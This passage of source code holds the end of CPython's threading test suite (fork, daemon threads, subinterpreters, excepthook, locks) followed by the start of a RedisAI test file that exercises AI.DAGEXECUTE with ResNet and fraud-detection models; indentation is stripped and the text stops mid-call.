def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
with open(os.__file__, 'rb') as in_f:
stuff = in_f.read(200)
with open(os.devnull, 'wb') as null_f:
null_f.write(stuff)
time.sleep(random.random() / 1995)
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(0)
else:
os._exit(1)
else:
_, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_daemon_threads_fatal_error(self):
subinterp_code = r"""if 1:
import os
import threading
import time
def f():
# Make sure the daemon thread is still running when
# Py_EndInterpreter is called.
time.sleep(10)
threading.Thread(target=f, daemon=True).start()
"""
script = r"""if 1:
import _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
with test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
thread.join()
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
thread.join()
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
@unittest.skipUnless(sys.platform == 'darwin' and test.support.python_is_optimized(),
'test macosx problem')
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RecursionError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""if True:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
@requires_type_collecting
def test_print_exception_stderr_is_none_1(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
def test_bare_raise_in_brand_new_thread(self):
def bare_raise():
raise
class Issue27558(threading.Thread):
exc = None
def run(self):
try:
bare_raise()
except Exception as exc:
self.exc = exc
thread = Issue27558()
thread.start()
thread.join()
self.assertIsNotNone(thread.exc)
self.assertIsInstance(thread.exc, RuntimeError)
# explicitly break the reference cycle to not leak a dangling thread
thread.exc = None
class ThreadRunFail(threading.Thread):
def run(self):
raise ValueError("run failed")
class ExceptHookTests(BaseTestCase):
def test_excepthook(self):
with support.captured_output("stderr") as stderr:
thread = ThreadRunFail(name="excepthook thread")
thread.start()
thread.join()
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {thread.name}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("run failed")', stderr)
self.assertIn('ValueError: run failed', stderr)
@support.cpython_only
def test_excepthook_thread_None(self):
# threading.excepthook called with thread=None: log the thread
# identifier in this case.
with support.captured_output("stderr") as stderr:
try:
raise ValueError("bug")
except Exception as exc:
args = threading.ExceptHookArgs([*sys.exc_info(), None])
try:
threading.excepthook(args)
finally:
# Explicitly break a reference cycle
args = None
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {threading.get_ident()}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("bug")', stderr)
self.assertIn('ValueError: bug', stderr)
def test_system_exit(self):
class ThreadExit(threading.Thread):
def run(self):
sys.exit(1)
# threading.excepthook() silently ignores SystemExit
with support.captured_output("stderr") as stderr:
thread = ThreadExit()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(), '')
def test_custom_excepthook(self):
args = None
def hook(hook_args):
nonlocal args
args = hook_args
try:
with support.swap_attr(threading, 'excepthook', hook):
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(args.exc_type, ValueError)
self.assertEqual(str(args.exc_value), 'run failed')
self.assertEqual(args.exc_traceback, args.exc_value.__traceback__)
self.assertIs(args.thread, thread)
finally:
# Break reference cycle
args = None
def test_custom_excepthook_fail(self):
def threading_hook(args):
raise ValueError("threading_hook failed")
err_str = None
def sys_hook(exc_type, exc_value, exc_traceback):
nonlocal err_str
err_str = str(exc_value)
with support.swap_attr(threading, 'excepthook', threading_hook), \
support.swap_attr(sys, 'excepthook', sys_hook), \
support.captured_output('stderr') as stderr:
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(),
'Exception in threading.excepthook:\n')
self.assertEqual(err_str, 'threading_hook failed')
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
timer1.join()
timer2.join()
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
extra = {"ThreadError"}
blacklist = {'currentThread', 'activeCount'}
support.check__all__(self, threading, ('threading', '_thread'),
extra=extra, blacklist=blacklist)
class InterruptMainTests(unittest.TestCase):
def test_interrupt_main_subthread(self):
# Calling start_new_thread with a function that executes interrupt_main
# should raise KeyboardInterrupt upon completion.
def call_interrupt():
_thread.interrupt_main()
t = threading.Thread(target=call_interrupt)
with self.assertRaises(KeyboardInterrupt):
t.start()
t.join()
t.join()
def test_interrupt_main_mainthread(self):
# Make sure that if interrupt_main is called in main thread that
# KeyboardInterrupt is raised instantly.
with self.assertRaises(KeyboardInterrupt):
_thread.interrupt_main()
def test_interrupt_main_noerror(self):
handler = signal.getsignal(signal.SIGINT)
try:
# No exception should arise.
signal.signal(signal.SIGINT, signal.SIG_IGN)
_thread.interrupt_main()
signal.signal(signal.SIGINT, signal.SIG_DFL)
_thread.interrupt_main()
finally:
# Restore original handler
signal.signal(signal.SIGINT, handler)
if __name__ == "__main__":
unittest.main()
|
tests_dag.py
|
import redis
from functools import wraps
import multiprocessing as mp
from includes import *
import time
'''
python -m RLTest --test tests_dag.py --module path/to/redisai.so
'''
def skip_if_not_version(major: int = 0, minor: int = 0, patch: int = 0):
def skipper(f):
@wraps(f)
def wrapper(env, *args, **kwargs):
con = get_connection(env, '{1}')
info = con.execute_command('INFO', 'SERVER')
M, m, p = info['redis_version'].split(".")
M = int(M)
m = int(m)
p = int(p)
if (M < major) or (M == major and m < minor) or (M == major and m == minor and p < patch):
env.debugPrint("skipping {0} since this test is for version {1}.{2}.{3} and above".format(
f.__name__, major, minor, patch), force=True)
return
return f(env, *args, **kwargs)
return wrapper
return skipper
# change this to make inference tests longer
MAX_TRANSACTIONS=100
def test_dagrun_modelexecute_scriptexecute_resnet(env):
if (not TEST_TF or not TEST_PT):
return
if(VALGRIND):
env.debugPrint("skipping {} since it's hanging CI".format(sys._getframe().f_code.co_name), force=True)
env.skip()
con = get_connection(env, '{1}')
model_name = 'imagenet_model:{1}'
script_name = 'imagenet_script:{1}'
image_key = 'image:{1}'
temp_key1 = 'temp_key1'
temp_key2 = 'temp_key2'
class_key = 'output:{1}'
inputvar = 'images'
outputvar = 'output'
model_pb, script, labels, img = load_resnet_test_data()
ret = con.execute_command('AI.MODELSTORE', model_name, 'TF', DEVICE,
'INPUTS', 1, inputvar,
'OUTPUTS', 1, outputvar,
'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ret = con.execute_command('AI.SCRIPTSTORE', script_name, DEVICE, 'ENTRY_POINTS', 4, 'pre_process_3ch', 'pre_process_4ch', 'post_process', 'ensemble', 'SOURCE', script)
env.assertEqual(ret, b'OK')
for opnumber in range(1,100):
ret = con.execute_command(
'AI.DAGEXECUTE', 'PERSIST', '1', class_key, '|>',
'AI.TENSORSET', image_key, 'UINT8', img.shape[1], img.shape[0], 3, 'BLOB', img.tobytes(), '|>',
'AI.SCRIPTEXECUTE', script_name, 'pre_process_3ch',
'INPUTS', 1, image_key,
'OUTPUTS', 1, temp_key1, '|>',
'AI.MODELEXECUTE', model_name,
'INPUTS', 1, temp_key1,
'OUTPUTS', 1, temp_key2, '|>',
'AI.SCRIPTEXECUTE', script_name, 'post_process',
'INPUTS', 1, temp_key2,
'OUTPUTS', 1, class_key
)
env.assertEqual([b'OK',b'OK',b'OK',b'OK'],ret)
ret = con.execute_command('AI.TENSORGET', class_key, 'VALUES' )
# tf model has 100 classes [0,999]
env.assertEqual(ret[0]>=0 and ret[0]<1001, True)
def test_dag_modelexecute_financialNet_separate_tensorget(env):
if not TEST_TF:
return
con = get_connection(env, '{1}')
model_pb, creditcard_transactions, creditcard_referencedata = load_creditcardfraud_data(
env)
model_name = 'financialNet{1}'
ret = con.execute_command('AI.MODELSTORE', model_name, 'TF', "CPU",
'INPUTS', 2, 'transaction', 'reference', 'OUTPUTS', 1, 'output', 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
for tensor_number in range(1,MAX_TRANSACTIONS):
for repetition in range(1,10):
reference_tensor = creditcard_referencedata[tensor_number]
transaction_tensor = creditcard_transactions[tensor_number]
result_tensor_keyname = 'resultTensor{{1}}{}'.format(tensor_number)
reference_tensor_keyname = 'referenceTensor{{1}}{}'.format(tensor_number)
transaction_tensor_keyname = 'transactionTensor{{1}}{}'.format(tensor_number)
ret = con.execute_command('AI.TENSORSET', reference_tensor_keyname,
'FLOAT', 1, 256,
'BLOB', reference_tensor.tobytes())
env.assertEqual(ret, b'OK')
ret = con.execute_command("EXISTS {}".format(reference_tensor_keyname))
env.assertEqual(ret, 1)
ret = con.execute_command(
'AI.DAGEXECUTE', 'LOAD', '1', reference_tensor_keyname,
'PERSIST', '1', result_tensor_keyname, '|>',
'AI.TENSORSET', transaction_tensor_keyname, 'FLOAT', 1, 30,'BLOB', transaction_tensor.tobytes(), '|>',
'AI.MODELEXECUTE', model_name,
'INPUTS', 2, transaction_tensor_keyname, reference_tensor_keyname,
'OUTPUTS', 1, result_tensor_keyname,
)
env.assertEqual([b'OK',b'OK'],ret)
ret = con.execute_command("AI.TENSORGET {} META".format(
result_tensor_keyname))
env.assertEqual([b'dtype', b'FLOAT', b'shape', [1, 2]], ret)
def test_dag_modelexecute_financialNet(env):
if not TEST_TF:
return
con = get_connection(env, '{1}')
model_pb, creditcard_transactions, creditcard_referencedata = load_creditcardfraud_data(
env)
model_name = 'financialNet{1}'
ret = con.execute_command('AI.MODELSTORE', model_name, 'TF', "CPU",
'INPUTS', 2, 'transaction', 'reference', 'OUTPUTS', 1, 'output', 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
for tensor_number in range(1,MAX_TRANSACTIONS):
for repetition in range(1,10):
reference_tensor = creditcard_referencedata[tensor_number]
transaction_tensor = creditcard_transactions[tensor_number]
result_tensor_keyname = 'resultTensor{{1}}{}'.format(tensor_number)
reference_tensor_keyname = 'referenceTensor{{1}}{}'.format(tensor_number)
transaction_tensor_keyname = 'transactionTensor{{1}}{}'.format(tensor_number)
ret = con.execute_command('AI.TENSORSET', reference_tensor_keyname,
'FLOAT', 1, 256,
'BLOB', reference_tensor.tobytes())
env.assertEqual(ret, b'OK')
ret = con.execute_command("EXISTS {}".format(reference_tensor_keyname))
env.assertEqual(ret, 1)
ret = con.execute_command(
'AI.DAGEXECUTE', 'LOAD', '1', reference_tensor_keyname,
'PERSIST', '1', result_tensor_keyname, '|>',
'AI.TENSORSET', transaction_tensor_keyname, 'FLOAT', 1, 30,'BLOB', transaction_tensor.tobytes(), '|>',
'AI.MODELEXECUTE', model_name,
'INPUTS', 2, transaction_tensor_keyname, reference_tensor_keyname,
'OUTPUTS', 1, result_tensor_keyname, '|>',
'AI.TENSORGET', result_tensor_keyname, 'META',
)
env.assertEqual([b'OK',b'OK',[b'dtype', b'FLOAT', b'shape', [1, 2]]], ret)
# assert that transaction tensor does not exist
ret = con.execute_command("EXISTS {}".format(transaction_tensor_keyname))
env.assertEqual(ret, 0)
# assert that result tensor exists
ret = con.execute_command("EXISTS {}".format(result_tensor_keyname))
env.assertEqual(ret, 1)
def test_dag_modelexecute_financialNet_autobatch(env):
if not TEST_TF:
return
con = get_connection(env, '{1}')
model_pb, creditcard_transactions, creditcard_referencedata = load_creditcardfraud_data(
env)
model_name = 'financialNet{1}'
ret = con.execute_command('AI.MODELSTORE', model_name, 'TF', 'CPU',
'BATCHSIZE', 2, 'MINBATCHSIZE', 2,
'INPUTS', 2, 'transaction', 'reference', 'OUTPUTS', 1, 'output',
'BLOB', model_pb)
env.assertEqual(ret, b'OK')
for tensor_number in range(1,MAX_TRANSACTIONS):
for repetition in range(1,10):
reference_tensor = creditcard_referencedata[tensor_number]
transaction_tensor = creditcard_transactions[tensor_number]
result_tensor_keyname = 'resultTensor{{1}}{}'.format(tensor_number)
reference_tensor_keyname = 'referenceTensor{{1}}{}'.format(tensor_number)
transaction_tensor_keyname = 'transactionTensor{{1}}{}'.format(tensor_number)
ret = con.execute_command('AI.TENSORSET', reference_tensor_keyname,
'FLOAT', 1, 256,
'BLOB', reference_tensor.tobytes())
env.assertEqual(ret, b'OK')
ret = con.execute_command("EXISTS {}".format(reference_tensor_keyname))
env.assertEqual(ret, 1)
def run():
con = get_connection(env, '{1}')
ret = con.execute_command(
'AI.DAGEXECUTE', 'LOAD', '1', reference_tensor_keyname, '|>',
'AI.TENSORSET', transaction_tensor_keyname, 'FLOAT', 1, 30,'BLOB', transaction_tensor.tobytes(), '|>',
'AI.MODELEXECUTE', model_name,
'INPUTS', 2, transaction_tensor_keyname, reference_tensor_keyname,
'OUTPUTS', 1, result_tensor_keyname
)
ensureSlaveSynced(con, env)
t = threading.Thread(target=run)
t.start()
ret = con.execute_command(
'AI.DAGEXECUTE', 'LOAD', '1', reference_tensor_keyname,
'PERSIST', '1', result_tensor_keyname, '|>',
'AI.TENSORSET', transaction_tensor_keyname, 'FLOAT', 1, 30,'BLOB', transaction_tensor.tobytes(), '|>',
'AI.MODELEXECUTE', model_name,
'INPUTS', 2, transaction_tensor_keyname, reference_tensor_keyname,
'OUTPUTS', 1, result_tensor_keyname, '|>',
'AI.TENSORGET', result_tensor_keyname, 'META',
)
t.join()
ensureSlaveSynced(con, env)
env.assertEqual([b'OK',b'OK',[b'dtype', b'FLOAT', b'shape', [1, 2]]], ret)
# assert that transaction tensor does not exist
ret = con.execute_command("EXISTS {}".format(transaction_tensor_keyname))
env.assertEqual(ret, 0)
# assert that result tensor exists
ret = con.execute_command("EXISTS {}".format(result_tensor_keyname))
env.assertEqual(ret, 1)
@skip_if_not_version(6, 2, 0)
def test_slowlog_time_dag_modelexecute_financialNet_autobatch(env):
if not TEST_TF:
return
con = get_connection(env, '{1}')
model_pb, creditcard_transactions, creditcard_referencedata = load_creditcardfraud_data(
env)
model_name = 'financialNet{1}'
batchsize = 2
ret = con.execute_command('AI.MODELSTORE', model_name, 'TF', 'CPU',
'BATCHSIZE', batchsize, 'MINBATCHSIZE', batchsize,
'INPUTS', 2, 'transaction', 'reference', 'OUTPUTS', 1, 'output',
'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ret = con.execute_command('CONFIG', 'SET', 'slowlog-log-slower-than', '1')
env.assertEqual(ret, b'OK')
total_time = 0
abs_time = 0
for tensor_number in range(1,MAX_TRANSACTIONS):
for repetition in range(1,10):
reference_tensor = creditcard_referencedata[tensor_number]
transaction_tensor = creditcard_transactions[tensor_number]
result_tensor_keyname = 'resultTensor{{1}}{}'.format(tensor_number)
reference_tensor_keyname = 'referenceTensor{{1}}{}'.format(tensor_number)
transaction_tensor_keyname = 'transactionTensor{{1}}{}'.format(tensor_number)
ret = con.execute_command('AI.TENSORSET', reference_tensor_keyname,
'FLOAT', 1, 256,
'BLOB', reference_tensor.tobytes())
env.assertEqual(ret, b'OK')
ret = con.execute_command("EXISTS {}".format(reference_tensor_keyname))
env.assertEqual(ret, 1)
def run():
con = get_connection(env, '{1}')
ret = con.execute_command(
'AI.DAGEXECUTE', 'LOAD', '1', reference_tensor_keyname, '|>',
'AI.TENSORSET', transaction_tensor_keyname, 'FLOAT', 1, 30,'BLOB', transaction_tensor.tobytes(), '|>',
'AI.MODELEXECUTE', model_name,
'INPUTS', 2, transaction_tensor_keyname, reference_tensor_keyname,
'OUTPUTS', 1, result_tensor_keyname
)
ensureSlaveSynced(con, env)
t = threading.Thread(target=run)
start = time.time()
t.start()
ret = con.execute_command(
'AI.DAGEXECUTE', 'LOAD', '1', reference_tensor_keyname,
'PERSIST', '1', result_tensor_keyname, '|>',
'AI.TENSORSET', transaction_tensor_keyname, 'FLOAT', 1, 30,'BLOB', transaction_tensor.tobytes(), '|>',
'AI.MODELEXECUTE', model_name,
'INPUTS', 2, transaction_tensor_keyname, reference_tensor_keyname,
'OUTPUTS', 1, result_tensor_keyname, '|>',
'AI.TENSORGET', result_tensor_keyname, 'META',
)
t.join()
ensureSlaveSynced(con, env)
end = time.time()
abs_time += (end - start)*1000000
prev_total = total_time
first = 0
for command in con.execute_command('SLOWLOG', 'GET', 10): # Look for "AI.DAGEXECUTE" commands in the last 10 commands.
if command[3][0] == b"AI.DAGEXECUTE" and first == 0: # Mark the first command found.
first = command[2]
elif command[3][0] == b"AI.DAGEXECUTE": # Found second command. add the slower time to total_time.
if first > command[2]:
total_time += first
env.assertGreaterEqual((end - start)*1000000, first)
else:
total_time += command[2]
env.assertGreaterEqual((end - start)*1000000, command[2])
break
elif command[3][0] == b"SLOWLOG": # The "SLOWLOG" is used as a mark for the previus iteration.
total_time += first # Try adding 'first'. The next assert test if first was not zero.
env.assertGreaterEqual((end - start)*1000000, first)
break
env.assertNotEqual(total_time, prev_total) # if somehow we didn't find any "AI.DAGEXECUTE" command, assert
info = con.execute_command('AI.INFO', model_name)
financialNetRunInfo = info_to_dict(info)
env.assertTrue(0 < financialNetRunInfo['duration'])
env.assertTrue(financialNetRunInfo['duration']//batchsize <= total_time)
env.assertTrue(total_time <= abs_time)
@skip_if_not_version(6, 2, 0)
def test_slowlog_time_dag_modelexecute_financialNet_no_writes(env):
if not TEST_TF:
return
con = get_connection(env, '{1}')
model_pb, creditcard_transactions, creditcard_referencedata = load_creditcardfraud_data(
env)
model_name = 'financialNet{1}'
ret = con.execute_command('AI.MODELSTORE', model_name, 'TF', "CPU",
'INPUTS', 2, 'transaction', 'reference', 'OUTPUTS', 1,'output', 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ret = con.execute_command('CONFIG', 'SET', 'slowlog-log-slower-than', '1')
env.assertEqual(ret, b'OK')
total_time = 0
abs_time = 0
for tensor_number in range(1,MAX_TRANSACTIONS):
for repetition in range(1,10):
reference_tensor = creditcard_referencedata[tensor_number]
transaction_tensor = creditcard_transactions[tensor_number]
result_tensor_keyname = 'resultTensor{{1}}{}'.format(tensor_number)
reference_tensor_keyname = 'referenceTensor{{1}}{}'.format(tensor_number)
transaction_tensor_keyname = 'transactionTensor{{1}}{}'.format(tensor_number)
ret = con.execute_command('AI.TENSORSET', reference_tensor_keyname,
'FLOAT', 1, 256,
'BLOB', reference_tensor.tobytes())
env.assertEqual(ret, b'OK')
ret = con.execute_command("EXISTS {}".format(reference_tensor_keyname))
env.assertEqual(ret, 1)
start = time.time()
ret = con.execute_command(
'AI.DAGEXECUTE', 'LOAD', '1', reference_tensor_keyname, '|>',
'AI.TENSORSET', transaction_tensor_keyname, 'FLOAT', 1, 30,'BLOB', transaction_tensor.tobytes(), '|>',
'AI.MODELEXECUTE', model_name,
'INPUTS', 2, transaction_tensor_keyname, reference_tensor_keyname,
'OUTPUTS', 1, result_tensor_keyname, '|>',
'AI.TENSORGET',result_tensor_keyname, 'META', '|>',
'AI.TENSORGET', result_tensor_keyname, 'VALUES'
)
end = time.time()
abs_time += (end - start)*1000000
prev_total = total_time
for command in con.execute_command('SLOWLOG', 'GET', 10):
if command[3][0] == b"AI.DAGEXECUTE":
total_time += command[2]
env.assertTrue((end - start)*1000000 >= command[2])
break
env.assertNotEqual(total_time, prev_total)
info = con.execute_command('AI.INFO', model_name)
financialNetRunInfo = info_to_dict(info)
env.assertTrue(0 < financialNetRunInfo['duration'])
env.assertTrue(financialNetRunInfo['duration'] <= total_time)
env.assertTrue(total_time <= abs_time)
def test_dag_modelexecute_financialNet_no_writes(env):
if not TEST_TF:
return
con = get_connection(env, '{1}')
model_pb, creditcard_transactions, creditcard_referencedata = load_creditcardfraud_data(
env)
model_name = 'financialNet{1}'
ret = con.execute_command('AI.MODELSTORE', model_name, 'TF', "CPU",
'INPUTS', 2, 'transaction', 'reference', 'OUTPUTS', 1,'output', 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
for tensor_number in range(1,MAX_TRANSACTIONS):
for repetition in range(1,10):
reference_tensor = creditcard_referencedata[tensor_number]
transaction_tensor = creditcard_transactions[tensor_number]
result_tensor_keyname = 'resultTensor{{1}}{}'.format(tensor_number)
reference_tensor_keyname = 'referenceTensor{{1}}{}'.format(tensor_number)
transaction_tensor_keyname = 'transactionTensor{{1}}{}'.format(tensor_number)
ret = con.execute_command('AI.TENSORSET', reference_tensor_keyname,
'FLOAT', 1, 256,
'BLOB', reference_tensor.tobytes())
env.assertEqual(ret, b'OK')
ret = con.execute_command("EXISTS {}".format(reference_tensor_keyname))
env.assertEqual(ret, 1)
ret = con.execute_command(
'AI.DAGEXECUTE', 'LOAD', '1', reference_tensor_keyname, '|>',
'AI.TENSORSET', transaction_tensor_keyname, 'FLOAT', 1, 30,'BLOB', transaction_tensor.tobytes(), '|>',
'AI.MODELEXECUTE', model_name,
'INPUTS', 2, transaction_tensor_keyname, reference_tensor_keyname,
'OUTPUTS', 1, result_tensor_keyname, '|>',
'AI.TENSORGET',result_tensor_keyname, 'META', '|>',
'AI.TENSORGET', result_tensor_keyname, 'VALUES'
)
env.assertEqual(4, len(ret))
env.assertEqual([b'OK', b'OK'], ret[:2])
env.assertEqual([b'dtype', b'FLOAT', b'shape', [1, 2]], ret[2])
values = ret[3]
# Assert that resulting classification is within [0,1]
env.assertEqual(True, 0 <= float(values[0]) <= 1)
env.assertEqual(True, 0 <= float(values[1]) <= 1)
# assert that transaction tensor does not exist
ret = con.execute_command("EXISTS {}".format(transaction_tensor_keyname))
env.assertEqual(ret, 0)
# assert that result tensor exists
ret = con.execute_command("EXISTS {}".format(result_tensor_keyname))
env.assertEqual(ret, 0)
def test_dagro_modelexecute_financialNet_no_writes_multiple_modelruns(env):
if not TEST_TF:
return
con = get_connection(env, '{1}')
model_pb, creditcard_transactions, creditcard_referencedata = load_creditcardfraud_data(
env)
model_name = 'financialNet_no_writes{1}'
ret = con.execute_command('AI.MODELSTORE', model_name, 'TF', "CPU",
'INPUTS', 2, 'transaction', 'reference', 'OUTPUTS', 1, 'output', 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
for tensor_number in range(1,MAX_TRANSACTIONS+1):
for repetition in range(1,11):
reference_tensor = creditcard_referencedata[tensor_number-1]
transaction_tensor = creditcard_transactions[tensor_number-1]
result_tensor_keyname = 'resultTensor{{1}}{}'.format(tensor_number)
reference_tensor_keyname = 'referenceTensor{{1}}{}'.format(tensor_number)
transaction_tensor_keyname = 'transactionTensor{{1}}{}'.format(tensor_number)
ret = con.execute_command('AI.TENSORSET', reference_tensor_keyname,
'FLOAT', 1, 256,
'BLOB', reference_tensor.tobytes())
env.assertEqual(ret, b'OK')
ret = con.execute_command("EXISTS {}".format(reference_tensor_keyname))
env.assertEqual(ret, 1)
ret = con.execute_command(
'AI.DAGEXECUTE_RO', 'LOAD', '1', reference_tensor_keyname, '|>',
'AI.TENSORSET', transaction_tensor_keyname, 'FLOAT', 1, 30,'BLOB', transaction_tensor.tobytes(), '|>',
